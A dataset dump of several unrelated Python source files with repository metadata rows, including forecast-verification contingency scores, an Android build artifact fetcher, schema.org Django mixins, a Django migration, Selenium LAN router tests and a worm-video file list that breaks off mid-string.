b = np.ma.sum(f_interval.within(fcst) & (interval.within(obs) == 0)) # FA
c = np.ma.sum((f_interval.within(fcst) == 0) & interval.within(obs)) # Miss
d = np.ma.sum((f_interval.within(fcst) == 0) & (interval.within(obs) == 0)) # CR
return [a, b, c, d]
def compute_from_obs_fcst(self, obs, fcst, interval, f_interval=None):
""" Computes the score
Arguments:
obs (np.array): array of observations
fcst (np.array): array of forecasts
interval (verif.interval.Interval): compute score for this interval
f_interval (verif.interval.Interval): Use this interval for forecasts.
If None, then use the same interval for obs and forecasts.
Returns:
float: The score
"""
[a, b, c, d] = self._compute_abcd(obs, fcst, interval, f_interval)
value = self.compute_from_abcd(a, b, c, d)
if np.isinf(value):
value = np.nan
return value
def compute_from_obs_fcst_resample(self, obs, fcst, N, interval, f_interval=None):
"""
Same as compute_from_obs_fcst, except compute more robust scores by
resampling (with replacement) using the computed values of a, b, c, d.
Arguments:
obs (np.array): array of observations
fcst (np.array): array of forecasts
N (int): Resample this many times
interval (verif.interval.Interval): compute score for this interval
f_interval (verif.interval.Interval): Use this interval for forecasts.
If None, then use the same interval for obs and forecasts.
Returns:
float: The score
"""
[a, b, c, d] = self._compute_abcd(obs, fcst, interval, f_interval)
# Resample
n = a + b + c + d
np.random.seed(1)
value = 0
for i in range(0, N):
aa = np.random.binomial(n, 1.0*a/n)
bb = np.random.binomial(n, 1.0*b/n)
cc = np.random.binomial(n, 1.0*c/n)
dd = np.random.binomial(n, 1.0*d/n)
value = value + self.compute_from_abcd(aa, bb, cc, dd)
value = value / N
return value
def label(self, variable):
return self.name
class A(Contingency):
name = "Hit"
description = "Hit"
def compute_from_abcd(self, a, b, c, d):
return 1.0 * a / (a + b + c + d)
class B(Contingency):
name = "False alarm"
description = "False alarm"
def compute_from_abcd(self, a, b, c, d):
return 1.0 * b / (a + b + c + d)
class C(Contingency):
name = "Miss"
description = "Miss"
def compute_from_abcd(self, a, b, c, d):
return 1.0 * c / (a + b + c + d)
class D(Contingency):
name = "Correct rejection"
description = "Correct rejection"
def compute_from_abcd(self, a, b, c, d):
return 1.0 * d / (a + b + c + d)
class N(Contingency):
name = "Total cases"
description = "Total cases"
max = None
def compute_from_abcd(self, a, b, c, d):
return a + b + c + d
class Ets(Contingency):
name = "Equitable threat score"
description = "Equitable threat score"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
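      # ar: number of hits expected by chance, given the marginal totals of
      # forecasts (a + b) and observations (a + c)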
ar = (a + b) / 1.0 / N * (a + c)
if a + b + c - ar == 0:
return np.nan
return (a - ar) / 1.0 / (a + b + c - ar)
def label(self, variable):
return "ETS"
class FcstRate(Contingency):
name = "Forecast rate"
description = "Fractions of forecasts (a + b)"
perfect_score = None
orientation = 0
def compute_from_abcd(self, a, b, c, d):
return (a + b) / 1.0 / (a + b + c + d)
class Dscore(Contingency):
name = "Discimination"
description = "Generalized discrimination score"
perfect_score = 1
orientation = 1
reference = "Simon J. Mason and Andreas P. Weigel, 2009: A Generic Forecast Verification Framework for Administrative Purposes. Mon. Wea. Rev., 137, 331-349."
max = 1
min = 0
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
num = a*d + 0.5*(a*b + c*d)
denom = (a + c) * (b + d)
if denom == 0:
return np.nan
return num / denom
class Threat(Contingency):
name = "Threat score"
description = "Threat score"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
if a + b + c == 0:
return np.nan
return a / 1.0 / (a + b + c)
class Pc(Contingency):
name = "Proportion correct"
description = "Proportion correct"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
return (a + d) / 1.0 / (a + b + c + d)
class Edi(Contingency):
name = "Extremal dependency index"
description = "Extremal dependency index"
perfect_score = 1
orientation = 1
reference = "Christopher A. T. Ferro and David B. Stephenson, 2011: Extremal Dependence Indices: Improved Verification Measures for Deterministic Forecasts of Rare Binary Events. Wea. Forecasting, 26, 699-713."
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
if b + d == 0 or a + c == 0:
return np.nan
F = b / 1.0 / (b + d)
H = a / 1.0 / (a + c)
if H == 0 or F == 0:
return np.nan
denom = (np.log(H) + np.log(F))
if denom == 0:
return np.nan
return (np.log(F) - np.log(H)) / denom
def label(self, variable):
return "EDI"
class Sedi(Contingency):
name = "Symmetric extremal dependency index"
description = "Symmetric extremal dependency index"
perfect_score = 1
orientation = 1
reference = Edi.reference
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
if b + d == 0 or a + c == 0:
return np.nan
F = b / 1.0 / (b + d)
H = a / 1.0 / (a + c)
if F == 0 or F == 1 or H == 0 or H == 1:
return np.nan
denom = np.log(F) + np.log(H) + np.log(1 - F) + np.log(1 - H)
if denom == 0:
return np.nan
num = np.log(F) - np.log(H) - np.log(1 - F) + np.log(1 - H)
return num / denom
def label(self, variable):
return "SEDI"
class Eds(Contingency):
name = "Extreme dependency score"
description = "Extreme dependency score"
min = None
perfect_score = 1
orientation = 1
reference = "Stephenson, D. B., B. Casati, C. A. T. Ferro, and C. A. Wilson, 2008: The extreme dependency score: A non-vanishing measure for forecasts of rare events. Meteor. Appl., 15, 41-50."
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
if a + c == 0:
return np.nan
H = a / 1.0 / (a + c)
p = (a + c) / 1.0 / N
if H == 0 or p == 0:
return np.nan
denom = (np.log(p) + np.log(H))
if denom == 0:
return np.nan
return (np.log(p) - np.log(H)) / denom
def label(self, variable):
return "EDS"
class Seds(Contingency):
name = "Symmetric extreme dependency score"
description = "Symmetric extreme dependency score"
min = None
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
if a + c == 0:
return np.nan
H = a / 1.0 / (a + c)
p = (a + c) / 1.0 / N
q = (a + b) / 1.0 / N
if q == 0 or H == 0:
return np.nan
denom = np.log(p) + np.log(H)
if denom == 0:
return np.nan
return (np.log(q) - np.log(H)) / (np.log(p) + np.log(H))
def label(self, variable):
return "SEDS"
class BiasFreq(Contingency):
name = "Bias frequency"
description = "Bias frequency (number of fcsts / number of obs)"
max = None
perfect_score = 1
orientation = 0
def compute_from_abcd(self, a, b, c, d):
if a + c == 0:
return np.nan
return 1.0 * (a + b) / (a + c)
class Hss(Contingency):
max = None
description = "Heidke skill score"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
denom = ((a + c) * (c + d) + (a + b) * (b + d))
if denom == 0:
return np.nan
return 2.0 * (a * d - b * c) / denom
class BaseRate(Contingency):
name = "Base rate"
description = "Base rate: Fraction of observations (a + c)"
perfect_score = None
orientation = 0
def compute_from_abcd(self, a, b, c, d):
if a + b + c + d == 0:
return np.nan
return (a + c) / 1.0 / (a + b + c + d)
class Or(Contingency):
name = "Odds ratio"
description = "Odds ratio"
max = None
perfect_score = None # Should be infinity
orientation = 1
def compute_from_abcd(self, a, b, c, d):
if b * c == 0:
return np.nan
return (a * d) / 1.0 / (b * c)
class Lor(Contingency):
name = "Log odds ratio"
description = "Log odds ratio"
max = None
perfect_score = None # Should be infinity
orientation = 1
def compute_from_abcd(self, a, b, c, d):
if a * d == 0 or b * c == 0:
return np.nan
return np.log((a * d) / 1.0 / (b * c))
class YulesQ(Contingency):
name = "Yule's Q"
description = "Yule's Q (Odds ratio skill score)"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
if a * d + b * c == 0:
return np.nan
return (a * d - b * c) / 1.0 / (a * d + b * c)
class Kss(Contingency):
name = "Hanssen-Kuiper skill score"
description = "Hanssen-Kuiper skill score"
perfect_score = 1
orientation = 1
reference = "Hanssen , A., W. Kuipers, 1965: On the relationship between the frequency of rain and various meteorological parameters. - Meded. Verh. 81, 2-15."
def compute_from_abcd(self, a, b, c, d):
if (a + c) * (b + d) == 0:
return np.nan
return (a * d - b * c) * 1.0 / ((a + c) * (b + d))
class Hit(Contingency):
name = "Hit rate"
description = "Hit rate (a.k.a. probability of detection)"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
if a + c == 0:
return np.nan
return a / 1.0 / (a + c)
class Miss(Contingency):
name = "Miss rate"
description = "Miss rate"
perfect_score = 0
orientation = -1
def compute_from_abcd(self, a, b, c, d):
if a + c == 0:
return np.nan
return c / 1.0 / (a + c)
# Fraction of non-events that are forecasted as events
class Fa(Contingency):
name = "False alarm rate"
description = "False alarm rate"
perfect_score = 0
orientation = -1
def compute_from_abcd(self, a, b, c, d):
if b + d == 0:
return np.nan
return b / 1.0 / (b + d)
# Fraction of forecasted events that are false alarms
class Far(Contingency):
name = "False alarm ratio"
description = "False alarm ratio"
perfect_score = 0
orientation = -1
def compute_from_abcd(self, a, b, c, d):
if a + b == 0:
return np.nan
return b / 1.0 / (a + b)
| [
"[email protected]"
] | |
e188217cf5dcdf7b3d1b7887be7a21f67e80e4ab | 544cfadc742536618168fc80a5bd81a35a5f2c99 | /tools/treble/fetcher/fetcher_lib.py | 0ec017318832788f675ab4ad2587b17824faa6f9 | [
"Apache-2.0"
] | permissive | ZYHGOD-1/Aosp11 | 0400619993b559bf4380db2da0addfa9cccd698d | 78a61ca023cbf1a0cecfef8b97df2b274ac3a988 | refs/heads/main | 2023-04-21T20:13:54.629813 | 2021-05-22T05:28:21 | 2021-05-22T05:28:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,512 | py | """Provides helper functions for fetching artifacts."""
import io
import os
import re
import sys
import sysconfig
import time
# This is a workaround to put '/usr/lib/python3.X' ahead of googleapiclient
# Using embedded_launcher won't work since py3-cmd doesn't contain _ssl module.
if sys.version_info.major == 3:
sys.path.insert(0, os.path.dirname(sysconfig.get_paths()['purelib']))
# pylint: disable=import-error,g-bad-import-order,g-import-not-at-top
import apiclient
from googleapiclient.discovery import build
from six.moves import http_client
import httplib2
from oauth2client.service_account import ServiceAccountCredentials
_SCOPE_URL = 'https://www.googleapis.com/auth/androidbuild.internal'
_DEF_JSON_KEYFILE = '.config/gcloud/application_default_credentials.json'
# 20 MB default chunk size -- used in Buildbot
_DEFAULT_CHUNK_SIZE = 20 * 1024 * 1024
# HTTP errors -- used in Buildbot
_DEFAULT_MASKED_ERRORS = [404]
_DEFAULT_RETRIED_ERRORS = [503]
_DEFAULT_RETRIES = 10
def _create_http_from_p12(robot_credentials_file, robot_username):
"""Creates a credentialed HTTP object for requests.
Args:
robot_credentials_file: The path to the robot credentials file.
robot_username: A string containing the username of the robot account.
Returns:
An authorized httplib2.Http object.
"""
try:
credentials = ServiceAccountCredentials.from_p12_keyfile(
service_account_email=robot_username,
filename=robot_credentials_file,
scopes=_SCOPE_URL)
except AttributeError:
raise ValueError('Machine lacks openssl or pycrypto support')
http = httplib2.Http()
return credentials.authorize(http)
def _simple_execute(http_request,
masked_errors=None,
retried_errors=None,
retry_delay_seconds=5,
max_tries=_DEFAULT_RETRIES):
"""Execute http request and return None on specified errors.
Args:
http_request: the apiclient provided http request
masked_errors: list of errors to return None on
    retried_errors: list of errors to retry the request on
retry_delay_seconds: how many seconds to sleep before retrying
    max_tries: maximum number of attempts to make the request
Returns:
The result on success or None on masked errors.
"""
if not masked_errors:
masked_errors = _DEFAULT_MASKED_ERRORS
if not retried_errors:
retried_errors = _DEFAULT_RETRIED_ERRORS
last_error = None
for _ in range(max_tries):
try:
return http_request.execute()
    except apiclient.errors.HttpError as e:
last_error = e
if e.resp.status in masked_errors:
return None
elif e.resp.status in retried_errors:
time.sleep(retry_delay_seconds)
else:
        # Any other error is neither masked nor retried; re-raise it
raise e
# We've gone through the max_retries, raise the last error
raise last_error # pylint: disable=raising-bad-type
def create_client(http):
"""Creates an Android build api client from an authorized http object.
Args:
http: An authorized httplib2.Http object.
Returns:
An authorized android build api client.
"""
return build(serviceName='androidbuildinternal', version='v2beta1', http=http)
def create_client_from_json_keyfile(json_keyfile_name=None):
"""Creates an Android build api client from a json keyfile.
Args:
json_keyfile_name: The location of the keyfile, if None is provided use
default location.
Returns:
An authorized android build api client.
"""
if not json_keyfile_name:
json_keyfile_name = os.path.join(os.getenv('HOME'), _DEF_JSON_KEYFILE)
credentials = ServiceAccountCredentials.from_json_keyfile_name(
filename=json_keyfile_name, scopes=_SCOPE_URL)
http = httplib2.Http()
credentials.authorize(http)
return create_client(http)
def create_client_from_p12(robot_credentials_file, robot_username):
"""Creates an Android build api client from a config file.
Args:
robot_credentials_file: The path to the robot credentials file.
robot_username: A string containing the username of the robot account.
Returns:
An authorized android build api client.
"""
http = _create_http_from_p12(robot_credentials_file, robot_username)
return create_client(http)
def fetch_artifact(client, build_id, target, resource_id, dest):
"""Fetches an artifact.
Args:
client: An authorized android build api client.
build_id: AB build id
target: the target name to download from
resource_id: the resource id of the artifact
dest: path to store the artifact
"""
out_dir = os.path.dirname(dest)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
dl_req = client.buildartifact().get_media(
buildId=build_id,
target=target,
attemptId='latest',
resourceId=resource_id)
print('Fetching %s to %s...' % (resource_id, dest))
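  # Stream the artifact to disk in _DEFAULT_CHUNK_SIZE chunks, retrying each
  # chunk up to _DEFAULT_RETRIES times on transient failures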
with io.FileIO(dest, mode='wb') as fh:
downloader = apiclient.http.MediaIoBaseDownload(
fh, dl_req, chunksize=_DEFAULT_CHUNK_SIZE)
done = False
while not done:
status, done = downloader.next_chunk(num_retries=_DEFAULT_RETRIES)
print('Fetching...' + str(status.progress() * 100))
print('Done Fetching %s to %s' % (resource_id, dest))
def get_build_list(client, **kwargs):
"""Get a list of builds from the android build api that matches parameters.
Args:
client: An authorized android build api client.
    **kwargs: keyword arguments to pass to build api.
Returns:
Response from build api.
"""
build_request = client.build().list(**kwargs)
return _simple_execute(build_request)
def list_artifacts(client, regex, **kwargs):
"""List artifacts from the android build api that matches parameters.
Args:
client: An authorized android build api client.
regex: Regular expression pattern to match artifact name.
    **kwargs: keyword arguments to pass to buildartifact.list api.
Returns:
List of matching artifact names.
"""
matching_artifacts = []
kwargs.setdefault('attemptId', 'latest')
regex = re.compile(regex)
req = client.buildartifact().list(**kwargs)
while req:
result = _simple_execute(req)
if result and 'artifacts' in result:
for a in result['artifacts']:
if regex.match(a['name']):
matching_artifacts.append(a['name'])
req = client.buildartifact().list_next(req, result)
return matching_artifacts
def fetch_artifacts(client, out_dir, target, pattern, build_id):
"""Fetches target files artifacts matching patterns.
Args:
client: An authorized instance of an android build api client for making
requests.
out_dir: The directory to store the fetched artifacts to.
target: The target name to download from.
pattern: A regex pattern to match to artifacts filename.
build_id: The Android Build id.
"""
if not os.path.exists(out_dir):
os.makedirs(out_dir)
# Build a list of needed artifacts
artifacts = list_artifacts(
client=client,
regex=pattern,
buildId=build_id,
target=target)
for artifact in artifacts:
fetch_artifact(
client=client,
build_id=build_id,
target=target,
resource_id=artifact,
dest=os.path.join(out_dir, artifact))
def get_latest_build_id(client, branch, target):
"""Get the latest build id.
Args:
client: An authorized instance of an android build api client for making
requests.
branch: The branch to download from
target: The target name to download from.
Returns:
The build id.
"""
build_response = get_build_list(
client=client,
branch=branch,
target=target,
maxResults=1,
successful=True,
buildType='submitted')
if not build_response:
raise ValueError('Unable to determine latest build ID!')
return build_response['builds'][0]['buildId']
def fetch_latest_artifacts(client, out_dir, target, pattern, branch):
"""Fetches target files artifacts matching patterns from the latest build.
Args:
client: An authorized instance of an android build api client for making
requests.
out_dir: The directory to store the fetched artifacts to.
target: The target name to download from.
pattern: A regex pattern to match to artifacts filename
branch: The branch to download from
"""
build_id = get_latest_build_id(
client=client, branch=branch, target=target)
fetch_artifacts(client, out_dir, target, pattern, build_id)
| [
"[email protected]"
] | |
15a60453aa5419b4fa377688c031c2632596a4f9 | 7ce479cac0a14d924159db9c784e3325b8f0bce7 | /schemaorgschemas/Thing/MedicalEntity/MedicalProcedure/__init__.py | cbefd8704afe1d477dfc83e65cb81ce50f18686e | [] | no_license | EvelineAndreea/AGRe | 1f0c27237eb047a60bbcfb8d73e3157035406409 | b952125896a82741f6617c259dd4060954583180 | refs/heads/master | 2020-04-08T16:08:11.517166 | 2018-11-28T07:15:56 | 2018-11-28T07:15:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,059 | py | # -*- coding: utf-8 -*-
from schemaorgschemas.Thing import potentialActionProp, nameProp, sameAsProp, imageProp, urlProp, mainEntityOfPageProp, additionalTypeProp, alternateNameProp, descriptionProp
from schemaorgschemas.Thing.MedicalEntity import codeProp, relevantSpecialtyProp, studyProp, guidelineProp, recognizingAuthorityProp, medicineSystemProp
from schemaorgschemas.djangoschema import SchemaObject, SchemaProperty, SchemaEnumProperty, SCHEMA_ORG
from django.conf import settings
class MedicalProcedureSchema(SchemaObject):
"""Schema Mixin for MedicalProcedure
Usage: place after django model in class definition, schema will return the schema.org url for the object
A process of care used in either a diagnostic, therapeutic, or palliative capacity that relies on invasive (surgical), non-invasive, or percutaneous techniques.
"""
def __init__(self):
self.schema = 'MedicalProcedure'
class followupProp(SchemaProperty):
"""
SchemaField for followup
Usage: Include in SchemaObject SchemaFields as your_django_field = followupProp()
schema.org description:Typical or recommended followup care after the procedure is performed.
prop_schema returns just the property without url#
format_as is used by app templatetags based upon schema.org datatype
"""
_prop_schema = 'followup'
_expected_schema = None
_enum = False
_format_as = "TextField"
class preparationProp(SchemaProperty):
"""
SchemaField for preparation
Usage: Include in SchemaObject SchemaFields as your_django_field = preparationProp()
schema.org description:Typical preparation that a patient must undergo before having the procedure performed.
prop_schema returns just the property without url#
format_as is used by app templatetags based upon schema.org datatype
"""
_prop_schema = 'preparation'
_expected_schema = None
_enum = False
_format_as = "TextField"
class procedureTypeProp(SchemaProperty):
"""
SchemaField for procedureType
Usage: Include in SchemaObject SchemaFields as your_django_field = procedureTypeProp()
schema.org description:The type of procedure, for example Surgical, Noninvasive, or Percutaneous.
prop_schema returns just the property without url#
format_as is used by app templatetags based upon schema.org datatype
used to reference MedicalProcedureType"""
_prop_schema = 'procedureType'
_expected_schema = 'MedicalProcedureType'
_enum = False
_format_as = "ForeignKey"
class howPerformedProp(SchemaProperty):
"""
SchemaField for howPerformed
Usage: Include in SchemaObject SchemaFields as your_django_field = howPerformedProp()
schema.org description:How the procedure is performed.
prop_schema returns just the property without url#
format_as is used by app templatetags based upon schema.org datatype
"""
_prop_schema = 'howPerformed'
_expected_schema = None
_enum = False
_format_as = "TextField"
# schema.org version 2.0
| [
"[email protected]"
] | |
222a8516170dbdfd60052c5217c8dbe791724e6b | a6df74bc7c139734bd9ce9f48d51e08fdc7d7efb | /article/migrations/0016_auto_20210412_1456.py | 34b4c21151d60a7d9f4aa95d47c0410f17c749cc | [] | no_license | Erlan1998/python_group_7_homework_68_Erlan_Kurbanaliev | 5a7f210e51f1998e5d52cdeb42538f2786af3f9f | fdc92be2c5187c78fecdc713f58e0e3e9fc62cb1 | refs/heads/master | 2023-05-03T17:01:59.066596 | 2021-05-26T13:28:41 | 2021-05-26T13:28:41 | 368,165,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 495 | py | # Generated by Django 3.1.6 on 2021-04-12 14:56
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('article', '0015_auto_20210412_1444'),
]
operations = [
migrations.AlterModelOptions(
name='article',
options={'permissions': [('сan_have_piece_of_pizza', 'Может съесть кусочек пиццы')], 'verbose_name': 'Статья', 'verbose_name_plural': 'Статьи'},
),
]
| [
"[email protected]"
] | |
3f6f9421f822fd2a774361edb18fd8c12c87027d | b58b175263f275e15a1b56bf1b0914db0f35ffc8 | /testcase/testcase_lan.py | 8d4326cbd823f38fc4d2cbf52a1cb50582dc55ed | [] | no_license | zeewii/BHU | aa9ff900a4bb6adb368081509b9f9222479f7742 | 1f3c4f634b44845f7a4f84535ff4904de4efc634 | refs/heads/master | 2021-01-09T21:49:01.534541 | 2015-09-30T09:21:28 | 2015-09-30T09:21:28 | 43,213,971 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,828 | py | #coding=utf-8
#Description: this module contains the test cases for the LAN module
#Author: 曾祥卫
import unittest
from selenium import webdriver
import time,os,commands
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
from login import login_control
from data import data
from network.interface import interface_control
from connect import ssh
from publicControl import public_control
from network.interface.lan import lan_business
from network.interface import interface_business
class TestLan(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Firefox()
        # Maximize the browser window
self.driver.maximize_window()
        # Log in to the LAN page using the default IP
lan_business.goin_default_lan(self)
def test_054_055_IP_netmask(self):
u"""修改LAN IP和A,B,C类子网掩码"""
#把4次修改LAN IP和子网掩码后client ping修改后ip的值取出
result = lan_business.step_100msh0054_100msh0055(self)
print result
        # Pass if all 4 results are 0, otherwise fail
        assert result == [0,0,0,0], u"LAN IP and class A/B/C subnet mask test failed"
        print u"LAN IP and class A/B/C subnet mask test passed"
def test_056_custom_netmask(self):
u"""lan自定义掩码设置"""
result = lan_business.step_100msh0056(self)
print result
        # Pass if all 4 results are 1, otherwise fail
        assert result == [1,1,1,1], u"LAN custom netmask configuration test failed"
        print u"LAN custom netmask configuration test passed"
def test_057_broadcast(self):
u"""lan广播地址配置有效性测试"""
result = lan_business.step_100msh0057(self)
print result
        # Pass if both results are 1, otherwise fail
        assert result == [1,1], u"LAN broadcast address configuration validity test failed"
        print u"LAN broadcast address configuration validity test passed"
def test_059_startip(self):
u"""IP地址池默认起始值检查"""
result = lan_business.step_100msh0059(self)
print result
        # Pass if the default start value of the IP address pool is 100, otherwise fail
        assert result == '100', u"IP address pool default start value test failed"
        print u"IP address pool default start value test passed"
def test_067_068_abnormal_input(self):
u"""lan异常输入测试"""
result = lan_business.step_100msh0067_100msh0068(self)
print result
        # Pass if all 4 results are 1, otherwise fail
        assert result == [1,1,1,1], u"LAN abnormal input test failed"
        print u"LAN abnormal input test passed"
    # Clean up on exit
def tearDown(self):
self.driver.quit()
if __name__=='__main__':
unittest.main()
__author__ = 'zeng'
| [
"[email protected]"
] | |
5a65c3db8f5241c487aab78f930d7ec197529388 | 5a4d5ee624b375ece06fda1467afe18beb69c14b | /Algorithm/SW_Expert/1-46.py | e2fcfc033cbfedd0121723aaeb2c5ba1ecc91913 | [] | no_license | Knightofcydonia51/TIL | cd10dab949659bc827118ee42b25d926336dce23 | 78d7e8617f4abed9932a557c12e68bd950f8230d | refs/heads/master | 2022-12-26T00:10:06.262200 | 2022-05-26T01:12:32 | 2022-05-26T01:12:32 | 195,938,010 | 0 | 0 | null | 2022-12-16T01:03:09 | 2019-07-09T05:22:49 | Python | UTF-8 | Python | false | false | 218 | py | def score(text):
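    # Map each letter to points (A=4, B=3, C=2, anything else=1) and sum them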
result=list(map(lambda x: 4 if x=='A' else 3 if x=='B' else 2 if x=='C' else 1 ,text))
return sum(result)
print(score('ADCBBBBCABBCBDACBDCAACDDDCAABABDBCBCBDBDBDDABBAAAAAAADADBDBCBDABADCADC')) | [
"[email protected]"
] | |
bd692ef3d3cce53cc175de340df496d1c8586914 | eb518a18d8055400c85d1b2f714fe9d4d654b941 | /compare_segworm/_old/head_tail_manual_switched.py | 6948c7b9e0ebe75f72f883facddf4243954e34e8 | [] | no_license | ver228/single-worm-analysis | c755709354025f629f7c774749394743c7b9a46b | 8d0a442fb93ad25aa30743f6c31f883639524a4d | refs/heads/master | 2021-09-14T11:31:17.761390 | 2018-05-12T23:00:54 | 2018-05-12T23:00:54 | 79,457,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,602 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 11 22:01:59 2016
@author: ajaver
"""
import h5py
import tables
import os
import numpy as np
import matplotlib.pylab as plt
from scipy.io import loadmat
import glob
import os
import pandas as pd
from MWTracker.featuresAnalysis.obtainFeaturesHelper import WormFromTable
from MWTracker.featuresAnalysis.obtainFeatures import getMicronsPerPixel, getFPS
good_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-116 (e2310)III on food L_2010_07_29__14_56___3___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/osm-9 (ky10) on food R_2010_06_15__14_57_24___8___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-108 (n501)I on food L_2009_12_10__14_02_38___2___9.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-103 (e1597)II on food R_2010_08_06__15_41_28___8___11.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-25 (gk1016)III on food L_2010_01_12__13_07_15___4___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-6 (n592)X on food L_2010_05_11__14_51_15___7___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-14 (n549)X on food L_2010_07_15__16_20___3___14.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-6 (ok3056)V on food R_2010_01_14__11_35___3___4.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/gar-2 (ok250)III on food R_2010_07_22__11_23_27___1___3.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/N2 on food R_2011_05_24__13_03_48___7___6.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/vab-7 (e1562)III on food L_2011_10_13__11_49_40___1___2.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-25 (gk1016)III on food R_2010_01_12__13_06_48___2___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-6 (n592)X on food R_2010_05_13__15_47___3___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/N2 on food L_2010_11_26__16_25_46___6___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-16 (ok3085) on food L_2010_01_11__12_35_14___7___4.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flr-1 (ut11) on food L_2010_04_09__15_53_02___1___14.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-32 (n155)I on food l_2010_05_11__16_50_11___7___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-1 (n487)V on food R_2010_07_15__11_47_56___1___4.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/daf-5 (e1386)II on food L_2010_07_22__14_46_33__8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/rab-3 (cy250) on food L_2011_08_04__11_10_43___2___3.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/acr-2 (ok1887) on food r_2010_02_19__14_43_43___8___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-27 (ok151)II on food R_2010_09_24__12_55___3___6.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-32 (n155)I on food R_2010_05_13__15_03_22___1___11.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-16 (e109) on food L_2009_12_11__12_21___3___2.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-63 (ok1075) on food L_2010_04_16__12_57_13___8___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-12 (n602)V on food L_2010_07_16__12_05_00___1___6.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/gpa-8 (pk435)V on food L_2010_03_11__10_25_35___8___2.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-79 (e1068)III on food L_2010_04_13__15_39_23___8___14.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-46 (n1127)V on food L_2010_08_06__16_02_11___7___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-8 (v488) on food R_2011_09_20__13_33_10___7___7.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/N2 on food L_2010_11_09__15_36_39___1___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-60 (e273)V on food L_2010_04_15__13_07_43__9.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/asic-1 (ok415) on food R_2010_06_15__11_26_21___2___3.hdf5'''
partial_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-116 (e2310)III on food L_2010_07_29__14_56___3___8.hdf5
15401-15415
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-101 (e1265) on food L_2010_09_23__12_37_31___8___6.hdf5
19804-19806, 19819-19830, 19886-19893, 19904-19907, 19921-19931, 19938-19938, 19945-19945, 19985-19986, 20055-20055
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-27 (ok151)II on food L_2010_08_05__14_44_24___2___11.hdf5
14045-14045, 14173-14184, 14226-14226, 14298-14298, 14333-14334, 14344-14344, 14378-14378
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/trp-1 (sy691) on food R_2010_04_21__14_59_17___8___10.hdf5
12231-12231, 12242-12243, 12250-12273, 12285-12285, 12295-12299, 12306-12306, 12331-12346, 12421-12457, 12464-12469, 12479-12480, 12664-12664, 12677-12701, 12830-12888, 12895-12923, 12930-12931,
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-104 (e1265)III on food R_2011_10_18__15_39___4___10.hdf5
2608-3747, 3755-5270
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-105 (ok1432) on food L_2010_07_06__11_44_23___2___6.hdf5
1812-1819, 1826-1832
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/acr-15 (ok1214)X on food L_2010_02_24__15_45_04___8___14.hdf5
250-411, 419-424, 700-700, 793-799, 808-811, 1012-1018, 1032-1032, 18761-18814
